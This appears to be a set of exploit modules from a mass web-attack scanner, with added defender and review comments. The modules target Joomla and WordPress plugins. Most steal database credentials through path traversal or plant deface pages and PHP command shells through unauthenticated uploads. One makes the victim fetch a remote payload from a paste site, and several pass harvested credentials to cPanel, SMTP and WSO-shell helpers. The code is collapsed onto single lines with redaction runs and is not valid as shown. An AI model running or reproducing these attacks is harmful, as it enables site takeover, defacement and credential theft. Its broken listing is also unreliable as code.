# Probe for file disclosure through the Joomla com_joomanager component: requests index.php with
# controller=details&task=download&path=configuration.php and treats 'JConfig' in the body as a hit.
# On a hit it appends the request URL and regex-extracted database settings to
# result/Config_results.txt and hands the body to getSMTP.GETSmtpJoomConf (defined elsewhere).
# Defender notes: that query string is the access-log indicator; a 200 response to it means
# configuration.php was disclosed, so rotate every credential stored in it and remove or update the component.
# NOTE(review): the '******' runs are redaction artifacts and the body is collapsed onto one line,
# so this listing is not valid Python as shown.
# NOTE(review): the bare `except:` clauses hide all errors; a negative verdict is not evidence of safety.
def Exploit(site): try: Exp = 'http://' + site + \ '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'JConfig' in str(GetConfig.content): with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) Getuser = re.findall("user = '******';", str(GetConfig.content)) Getpass = re.findall("password = '******';", str(GetConfig.content)) Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') getSMTP.GETSmtpJoomConf(str(GetConfig.content)) except: return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla')
# Probe for path traversal in the Joomla com_hdflvplayer download script: requests
# download.php?f=../../../configuration.php and treats 'JConfig' in the body as a hit.
# On a hit it appends the URL and regex-extracted database settings to result/Config_results.txt
# and passes the body to getSMTP.GETSmtpJoomConf (defined elsewhere).
# Defender notes: requests to hdflvplayer/download.php whose f= value contains '../' are the log
# indicator; after a hit, rotate the credentials held in configuration.php and remove or update the component.
# NOTE(review): the '******' runs are redaction artifacts; the listing is not valid Python as shown.
# NOTE(review): bare `except:` hides all errors; the inner one still reports the site as vulnerable.
def Exploit(site): try: Exp = 'http://' + site + \ '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php' GetConfig = requests.get(Exp, timeout=5, headers=Headers) if 'JConfig' in str(GetConfig.content): with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) Getuser = re.findall("user = '******';", str(GetConfig.content)) Getpass = re.findall("password = '******';", str(GetConfig.content)) Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') getSMTP.GETSmtpJoomConf(str(GetConfig.content)) except: return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
# Unauthenticated upload test against the WordPress viral-optins plugin: POSTs files/vuln.txt as
# 'Filedata' to api/uploader/file-uploader.php and looks for 'id="wpvimgres"' in the reply.
# It then fetches the expected upload location (built from the module-level `year`/`month`) and the
# URL echoed in the response, and records whichever returns the 'Vuln!!' marker in result/Index_results.txt.
# Defender notes: POSTs to file-uploader.php and unexpected vuln.txt files under wp-content/uploads
# are the indicators; remove or update the plugin and require authentication on the upload handler.
# NOTE(review): the opened file handle is never closed; bare `except:` maps every error to a negative result.
def Exploit(site): try: defaceFile = { 'Filedata': ('vuln.txt', open('files/vuln.txt', 'rb'), 'text/html') } x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php', files=defaceFile, timeout=5, headers=Headers) if 'id="wpvimgres"' in x.content: uploader = site + '/wp-content/uploads/20' + year + '/' + month + '/vuln.txt' GoT = requests.get('http://' + uploader, timeout=5, headers=Headers) find = re.findall('<img src="http://(.*)" height="', x.content) GoT2 = requests.get('http://' + find[0], timeout=5, headers=Headers) if 'Vuln!!' in GoT.content: with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/wp-content/uploads/20' + year + '/' + month + '/vuln.txt' + '\n') return printModule.returnYes(site, 'N/A', 'Viral-options', 'Wordpress') elif 'Vuln!!' in GoT2.content: with open('result/Index_results.txt', 'a') as writer: writer.write(site + find[0] + '\n') return printModule.returnYes(site, 'N/A', 'Viral-options', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress') except: return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress')
# Upload test against the WordPress downloads-manager plugin (reported by this code as CVE-2008-3362).
# Fingerprints the plugin by fetching img/unlock.gif, then POSTs an image to the site root with the
# 'dm_upload' field and checks for it under plugins/downloads-manager/upload/. If the image landed it
# repeats the upload with a PHP file, requests it, and checks /wp-content/vuln.php for the 'Vuln!!' marker.
# Results go to result/Shell_results.txt and result/Index_results.txt.
# Defender notes: multipart POSTs to '/' carrying dm_upload/upfile and new files in the plugin's
# upload/ directory are the indicators; remove the plugin and deny script execution in upload directories.
# NOTE(review): one GET has no timeout, the file handles are never closed, and bare `except:` hides errors.
def Exploit(site): try: Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=10, headers=Headers) if 'GIF89a' in str(Checkvuln.content): PostDAta = {'dm_upload': ''} fileDeface = {'upfile': open(Jce_Deface_image, 'rb')} fileShell = {'upfile': open(pagelinesExploitShell, 'rb')} requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=10, headers=Headers) CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' + Jce_Deface_image.split('/')[1]) if 'GIF89a' in str(CheckIndex.content): requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=10, headers=Headers) requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' + pagelinesExploitShell.split('/')[1], timeout=10, headers=Headers) CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/wp-content/plugins/downloads-manager/upload/' + pagelinesExploitShell.split('/')[1] + '\n') with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') else: with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/wp-content/plugins/downloads-manager/upload/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
# Upload test against the Joomla com_jbcatalog bundled upload handler (libraries/jsupload/server/php).
# If the handler answers 200 it POSTs the file named by ShellPresta as 'files[]' and checks
# server/php/files/up.php for the 'Vuln!!' marker; failing that it uploads the image named by
# Jce_Deface_image and checks for a 'GIF89a' header. Hits are appended to the result/*.txt files.
# Defender notes: POSTs to that handler and new files under server/php/files/ are the indicators;
# remove or update the component and deny script execution in that directory.
# NOTE(review): file handles are never closed; bare `except:` maps every error to a negative result.
def Exploit(site): try: Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', timeout=10, headers=Headers) if Check.status_code == 200: ShellFile = {'files[]': open(ShellPresta, 'rb')} requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', files=ShellFile, headers=Headers, timeout=10) CheckShell = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n') return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla') else: ShellFile = {'files[]': open(Jce_Deface_image, 'rb')} requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', files=ShellFile, headers=Headers, timeout=10) CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/' 'php/files/' + Jce_Deface_image.split('/')[1], timeout=10, headers=Headers) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
# Upload test against the Joomla com_alberghi administrator upload page (upload.alberghi.php).
# It confirms the upload form is reachable without a session (looks for the 'userfile' input),
# POSTs the image named by Jce_Deface_image, then fetches it back and checks for a 'GIF89a' header.
# Defender notes: unauthenticated GET/POST to /administrator/components/com_alberghi/upload.alberghi.php
# is the indicator; remove the component or put the administrator tree behind authentication.
# NOTE(review): `'has been successfully' or 'already exists' in ...` is always true because the left
# operand is a non-empty string, so the upload response is not actually inspected.
# NOTE(review): bare `except:` maps every error to a negative result; the file handle is never closed.
def Exploit(site): try: fileDeface = {'userfile': open(Jce_Deface_image, 'rb')} Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php' Check = requests.get(Exp, timeout=10, headers=Headers) if 'class="inputbox" name="userfile"' in str(Check.content): Post = requests.post(Exp, files=fileDeface, timeout=10, headers=Headers) if 'has been successfully' or 'already exists' in str( Post.content): CheckIndex = requests.get( site + '/administrator/components/com_alberghi/' + Jce_Deface_image.split('/')[1], timeout=10, headers=Headers) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write( site + '/administrator/components/com_alberghi/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
# Upload test against the Joomla com_rokdownloads assets/uploadhandler.php endpoint.
# If the handler answers 200 or 500 it POSTs a PHP file as 'files[]' with the form field
# jpath='../../../../' and checks /images/stories/up.php for the 'Vuln!!' marker; otherwise it
# uploads an image the same way and checks for a 'GIF89a' header. Hits go to the result/*.txt files.
# Defender notes: POSTs to uploadhandler.php carrying a jpath value with '../' and new files under
# /images/stories/ are the indicators; remove or update the component and deny PHP execution in /images.
# NOTE(review): file handles are never closed; bare `except:` maps every error to a negative result.
def Exploit(site): try: Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php', timeout=10, headers=Headers) if Check.status_code == 200 or Check.status_code == 500: IndeX = {'files[]': open(Jce_Deface_image, 'rb')} ShellFile = {'files[]': open(ShellPresta, 'rb')} Datapost = {'jpath': '../../../../'} requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php', files=ShellFile, data=Datapost, timeout=10, headers=Headers) CheckShell = requests.get('http://' + site + '/images/stories/up.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/stories/up.php\n') return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla') else: requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php', files=IndeX, data=Datapost, timeout=10, headers=Headers) CheckIndex = requests.get('http://' + site + '/images/stories/' + Jce_Deface_image.split('/')[1], headers=Headers, timeout=10) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/images/stories/' + Jce_Deface_image.split('/')[1] + '\n') return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
# Probe for file disclosure through the Joomla s5_media_player plugin: requests helper.php with a
# base64 `fileurl` value (it decodes to a '../'-relative path to configuration.php) and treats
# 'JConfig' in the body as a hit.
# On a hit it appends the URL and regex-extracted database settings to result/Config_results.txt
# and passes the body to getSMTP.GETSmtpJoomConf (defined elsewhere).
# Defender notes: because the path is base64-encoded, a plain '../' signature will not match;
# alert on any unauthenticated request to s5_media_player/helper.php?fileurl=. After a hit, rotate
# the credentials held in configuration.php and remove or update the plugin.
# NOTE(review): the '******' runs are redaction artifacts; the listing is not valid Python as shown.
def Exploit(site): try: Exp = 'http://' + site + \ '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'JConfig' in str(GetConfig.content): with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("host = '(.*)';", str(GetConfig.content)) Getuser = re.findall("user = '******';", str(GetConfig.content)) Getpass = re.findall("password = '******';", str(GetConfig.content)) Getdb = re.findall("db = '(.*)';", str(GetConfig.content)) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') getSMTP.GETSmtpJoomConf(str(GetConfig.content)) except: return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla') return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla')
# Probe for the Revslider file-disclosure issue this code labels CVE-2015-1579: requests
# admin-ajax.php?action=revslider_show_image&img=../wp-config.php and treats 'DB_PASSWORD' in the
# body as a hit. On a hit it calls Attack(site) (defined elsewhere), logs the URL and the DB_*
# values to result/Config_results.txt, and passes the extracted DB user/password to cpanel.Check
# (defined elsewhere; presumably tries them against another login - confirm).
# Defender notes: admin-ajax.php requests with action=revslider_show_image and an img= value that
# is not an image are the indicator; after a hit, rotate the database password and any account
# that shares it, and update the plugin.
# NOTE(review): the '******' runs are redaction artifacts, and in this collapsed form the inline
# '#define(...)' comment swallows the rest of the line; the listing is not valid Python as shown.
def Exploit(site): try: Exp = 'http://' + site + \ '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'DB_PASSWORD' in str(GetConfig.content): Attack(site) with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: #define('DB_USER', 'admin_soljica2'); Gethost = re.findall("'DB_HOST', '(.*)'", str(GetConfig.content)) Getuser = re.findall("'DB_USER', '(.*)'", str(GetConfig.content)) Getpass = re.findall("'DB_PASSWORD', '(.*)'", str(GetConfig.content)) Getdb = re.findall("'DB_NAME', '(.*)'", str(GetConfig.content)) cpanel.Check(site, Getuser[0], Getpass[0]) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[ 0] + '\n---------------------\n') return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress') except: return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
# Probe for path traversal in the WordPress wp-support-plus-responsive-ticket-system plugin:
# requests includes/admin/downloadAttachment.php?path=../../../../../wp-config.php and treats
# 'DB_PASSWORD' in the body as a hit, then logs the URL and DB_* values to result/Config_results.txt.
# Defender notes: requests to downloadAttachment.php whose path= value contains '../' are the
# indicator; after a hit, rotate the database credentials and update or remove the plugin.
# NOTE(review): the '******' runs are redaction artifacts; the listing is not valid Python as shown.
# NOTE(review): bare `except:` hides all errors; the inner one still reports the site as vulnerable.
def Exploit(site): try: Exp = 'http://' + site + \ '/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \ 'downloadAttachment.php?path=../../../../../wp-config.php' GetConfig = requests.get(Exp, timeout=5, headers=Headers) if 'DB_PASSWORD' in GetConfig.content: with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content) Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content) Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content) Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') except: return printModule.returnYes(site, 'N/A', 'wp-support-plus', 'Wordpress') return printModule.returnYes(site, 'N/A', 'wp-support-plus', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'wp-support-plus', 'Wordpress') except: return printModule.returnNo(site, 'N/A', 'wp-support-plus', 'Wordpress')
# Probe for path traversal in the WordPress ungallery plugin: requests
# source_vuln.php?pic=../../../../../wp-config.php and treats 'DB_PASSWORD' in the body as a hit,
# then logs the URL and DB_* values to result/Config_results.txt.
# Defender notes: requests to ungallery/source_vuln.php whose pic= value contains '../' are the
# indicator; after a hit, rotate the database credentials and remove or update the plugin.
# NOTE(review): the '******' runs are redaction artifacts; the listing is not valid Python as shown.
# NOTE(review): bare `except:` hides all errors; the inner one still reports the site as vulnerable.
def Exploit(site): try: Exp = 'http://' + site + \ '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php' GetConfig = requests.get(Exp, timeout=10, headers=Headers) if 'DB_PASSWORD' in GetConfig.content: with open('result/Config_results.txt', 'a') as ww: ww.write('Full Config Path : ' + Exp + '\n') try: Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content) Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content) Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content) Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content) with open('result/Config_results.txt', 'a') as ww: ww.write(' Host: ' + Gethost[0] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] + '\n---------------------\n') except: return printModule.returnYes(site, 'N/A', 'ungallery Plugin', 'Wordpress') return printModule.returnYes(site, 'N/A', 'ungallery Plugin', 'Wordpress') else: return printModule.returnNo(site, 'N/A', 'ungallery Plugin', 'Wordpress') except: return printModule.returnNo(site, 'N/A', 'ungallery Plugin', 'Wordpress')
# Upload test for the Gravity Forms issue this code labels CVE-2015-4455: POSTs the file named by
# `index` to /?gf_page=upload twice, with gform_unique_id set to '../../../../' and then
# '../../../../../' and name='vuln.htm', then checks /_input_3_vuln.htm and
# /wp-content/_input_3_vuln.htm for the 'Vuln!!' marker and logs a hit to result/Index_results.txt.
# Defender notes: POSTs to ?gf_page=upload whose gform_unique_id contains '../', and files named
# _input_3_vuln.htm in the web root or wp-content, are the indicators; update the plugin.
# The uploads use a fixed Firefox 28 User-Agent string while the checks use the shared Headers.
# NOTE(review): the same open file object is sent twice, so the second POST presumably carries an
# empty body - confirm. Bare `except:` maps every error to a negative result.
def Exploit(site): try: UserAgent = { 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' } fileDeface = {'file': open(index, 'rb')} post_data = { 'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'vuln.htm' } post_data2 = { 'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'vuln.htm' } url = "http://" + site + '/?gf_page=upload' requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5) requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5) CheckIndex = requests.get('http://' + site + '/_input_3_vuln.htm', timeout=5, headers=Headers) CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_vuln.htm', timeout=5, headers=Headers) if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/_input_3_vuln.htm' + '\n') return printModule.returnYes(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress') elif 'Vuln!!' in str(CheckIndex2.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/wp-content/_input_3_vuln.htm' + '\n') return printModule.returnYes(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2015-4455', 'Gravity forms Index', 'Wordpress')
# Upload test against the Joomla com_adsmanager upload task (index.php?option=com_adsmanager&task=upload).
# It POSTs the file named by `indeX` under the names vuln.php, vuln.phP and vuln.phtml, then checks
# /tmp/plupload/ for each name plus /vuln.htm and /images/vuln.php for the 'Vuln!!' marker, logging
# hits to result/Shell_results.txt and result/Index_results.txt. Every miss or error falls back to
# com_adsmanager_index(site) (defined elsewhere).
# Defender notes: POSTs to task=upload from unauthenticated clients and script-extension files
# appearing in /tmp/plupload/ are the indicators; case and extension variants (.phP, .phtml) show
# why an extension blocklist is not enough - deny script execution in upload/tmp directories.
# NOTE(review): two of the fallback branches call com_adsmanager_index without returning its result.
def Exploit(site): try: fileindex = {'file': open(indeX, 'rb')} post_data = {"name": "vuln.php", "submit": "Upload"} Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component" GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers) if '"jsonrpc"' in str(GoT.content): requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=10, headers=Headers) requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=10, headers=Headers) Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=10, headers=Headers) Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=10, headers=Headers) Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=10, headers=Headers) CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=10, headers=Headers) CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(Check.content): if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/vuln.php' + '\n') if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'N/A', 'Com_adsmanager', 'Joomla') else: com_adsmanager_index(site) elif 'Vuln!!' in str(Check2.content): if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/vuln.php' + '\n') if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'N/A', 'Com_adsmanager', 'Joomla') else: com_adsmanager_index(site) elif 'Vuln!!' in str(Check3.content): if 'Vuln!!' 
in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/images/vuln.php' + '\n') if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/vuln.htm' + '\n') return printModule.returnYes(site, 'N/A', 'Com_adsmanager', 'Joomla') else: return com_adsmanager_index(site) else: return com_adsmanager_index(site) else: return com_adsmanager_index(site) except: return com_adsmanager_index(site)
# Test for the Social Warfare plugin issue this code labels CVE-2019-9978: requests
# wp-admin/admin-post.php?swp_debug=load_options with swp_url pointing at a remote paste, then
# checks /wp-admin/vuln.php and /wp-admin/vuln.htm for the 'Vuln!!' marker and logs hits to the
# result/*.txt files.
# Defender notes: admin-post.php requests carrying swp_debug=load_options and an external swp_url,
# the resulting outbound fetch from the web server, and new vuln.php/vuln.htm files under /wp-admin
# are the indicators; update the plugin and restrict egress from the web tier where practical.
# NOTE(review): bare `except:` maps every error to a negative result.
def Exploit(site): try: Payload = 'https://hastebin.com/raw/etonipusij' exp = 'http://{}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={}'.format( site, Payload) requests.get(exp, timeout=10, headers=Headers) CheckShell = requests.get('http://{}/wp-admin/vuln.php'.format(site), timeout=10, headers=Headers) CheckIndex = requests.get('http://{}/wp-admin/vuln.htm'.format(site), timeout=10, headers=Headers) if 'Vuln!!' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write('{}/wp-admin/vuln.htm\n'.format(site)) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( '{}/wp-admin/vuln.php?cmd=whoami;);\n'.format(site)) return printModule.returnYes(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress')
# Upload test against the Joomla com_b2jcontact uploader view: POSTs the module-level `payloadshell`
# body to index.php?option=com_b2jcontact&view=loader&type=uploader with qqfile=/../../../vuln.php,
# then checks /components/com_b2jcontact/vuln.php for the 'Vuln!!' marker. On a hit it logs the URL
# to result/Shell_results.txt and calls getSMTP.JooomlaSMTPshell on it (defined elsewhere).
# Defender notes: requests to that view whose qqfile value contains '../' and a new vuln.php in the
# component directory are the indicators; update or remove the component and treat a hit as code
# execution on the host (rotate secrets, review for further dropped files).
# NOTE(review): bare `except:` maps every error to a negative result.
def Exploit(site): try: requests.post( 'http://' + site + '/index.php?option=com_b2jcontact&view=loader&type=uploader&' 'owner=component&bid=1&qqfile=/../../../vuln.php', data=payloadshell, timeout=10, headers=Headers) CheckSh = requests.get('http://' + site + '/components/com_b2jcontact/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckSh.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/components/com_b2jcontact/vuln.php?cmd=id') return printModule.returnYes(site, 'N/A', 'Com_b2jcontact', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
# Upload test against the Joomla com_simplephotogallery lib/uploadFile.php endpoint: POSTs
# `payloadshell` as 'vuln.php.xxxjpg' with a URL-encoded jpath pointing at ../../../../tmp/, then
# checks /tmp/vuln.php.xxxjpg for the 'Vuln!!' marker. On a hit it logs the URL, calls
# getSMTP.JooomlaSMTPshell and wsoShellUploaderModule.UploadWso (both defined elsewhere), and
# records any non-'No' UploadWso result in result/WSo_Shell.txt.
# Defender notes: POSTs to uploadFile.php with a jpath containing encoded '../', and files with a
# double extension such as .php.xxxjpg under /tmp, are the indicators; the double extension relies
# on the server executing files by an inner '.php' - confirm the handler mapping and deny script
# execution in /tmp and upload directories.
# NOTE(review): bare `except:` maps every error to a negative result.
def Exploit(site): try: PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'} fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')} requests.post( 'http://' + site + '/administrator/components/com_simplephotogallery/lib/uploadFile.php', data=PostData, files=fil, timeout=10, headers=Headers) Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg', timeout=10, headers=Headers) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/tmp/vuln.php.xxxjpg?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla')
# Test for the Drupal 7 SQL injection this code labels CVE-2014-3704: POSTs the user_login_block
# form to /?q=node&destination=node with a crafted `name[...]` array key that carries INSERT
# statements for the users and users_roles tables (role id 3), using a pre-computed password hash
# truncated to 55 characters. A response containing 'mb_strlen() expects parameter 1' is treated
# as success and the login details are appended to result/AdminTakeover_results.txt.
# Defender notes: login-form POSTs whose field names contain SQL keywords inside name[...] are the
# indicator; on any suspicion, audit the users and users_roles tables for unexpected accounts and
# role grants, update Drupal core, and assume database contents were exposed.
# NOTE(review): `user`, `password` and 'pass' are shown as '******' redaction artifacts.
# NOTE(review): bare `except:` maps every error to a negative result.
